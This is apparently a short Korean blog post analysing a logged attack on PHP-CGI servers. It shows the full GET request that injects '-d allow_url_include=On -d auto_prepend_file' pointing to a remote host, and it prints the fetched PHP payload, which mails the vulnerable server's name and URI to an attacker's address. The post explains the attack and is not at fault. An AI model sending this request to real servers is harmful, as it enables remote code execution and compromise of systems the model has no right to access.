GET index.php/?-d allow_url_include=On -d auto_prepend_file=http://netsunucum.com/status/-/d.txt

위 요청은 외부의 파일을 include, include_once, require, require_once 와 같은 파일로 include 허용시키고, http://netsunucum.com/status/-/d.txt 파일을 실행키려는 것이다.(index.php를 나중에 실행한다.)
http://netsunucum.com/status/-/d.txt 파일의 내용은 아래와 같다.

 

SP4M3R
<?php
$from = "INBOX <h4x0r@r0x.com">";
$sentTo = "vaidominio2@gmail.com";
$subject = "VULN r0x";
$msg_body = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$header_info = "From: ".$from;
mail($sentTo, $subject, $msg_body, $header_info);
?>

php 웹 서버가 취약하면, 위의 코드가 실행되서 공격자의 gmail계정으로 서버명과 요청 URI가 전송된다.


+ Recent posts